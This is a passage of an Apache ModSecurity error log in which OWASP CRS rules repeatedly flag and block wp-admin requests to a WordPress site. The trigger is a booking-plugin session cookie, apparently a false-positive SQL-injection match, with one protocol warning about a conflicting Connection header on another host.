[Mon May 11 18:29:27.839780 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID5zJnyuKVXoStDhbhJgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:28.485788 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID6DJnyuKVXoStDhbhKQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:28.486083 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID6DJnyuKVXoStDhbhKQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:29.419962 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID6DJnyuKVXoStDhbhKQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:29.820551 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID6TJnyuKVXoStDhbhLAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:29.820811 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID6TJnyuKVXoStDhbhLAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:30.392367 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID6TJnyuKVXoStDhbhLAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:30.497500 2026] [security2:error] [pid 1424905:tid 1424912] [client 129.226.214.57:40130] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "mail.piregwan-genesis.com"] [uri "/"] [unique_id "agID6oW8yzYoWG_eyCXBRwAAAUQ"], referer: http://mail.piregwan-genesis.com
[Mon May 11 18:29:30.516505 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID6jJnyuKVXoStDhbhLgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:30.516792 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID6jJnyuKVXoStDhbhLgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:31.420224 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID6jJnyuKVXoStDhbhLgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:31.513709 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID6zJnyuKVXoStDhbhMAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:31.513996 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID6zJnyuKVXoStDhbhMAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:31.877894 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID6zJnyuKVXoStDhbhMAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:32.236460 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID7DJnyuKVXoStDhbhMgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:32.236887 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID7DJnyuKVXoStDhbhMgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:32.844511 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID7DJnyuKVXoStDhbhMgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:33.090175 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID7TJnyuKVXoStDhbhMwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:33.090460 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID7TJnyuKVXoStDhbhMwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:33.698758 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID7TJnyuKVXoStDhbhMwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:33.999565 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID7TJnyuKVXoStDhbhNQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:33.999850 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID7TJnyuKVXoStDhbhNQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:34.615562 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID7TJnyuKVXoStDhbhNQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:34.898989 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID7jJnyuKVXoStDhbhNgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:34.899291 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID7jJnyuKVXoStDhbhNgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:35.476107 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID7jJnyuKVXoStDhbhNgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:35.688455 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID7zJnyuKVXoStDhbhOAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:35.688750 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID7zJnyuKVXoStDhbhOAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:36.240389 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID7zJnyuKVXoStDhbhOAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:36.406090 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID8DJnyuKVXoStDhbhOQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:36.406393 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID8DJnyuKVXoStDhbhOQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:36.854616 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID8DJnyuKVXoStDhbhOQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:37.147498 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID8TJnyuKVXoStDhbhOwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:37.147760 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID8TJnyuKVXoStDhbhOwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:37.818446 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID8TJnyuKVXoStDhbhOwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:38.079953 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id 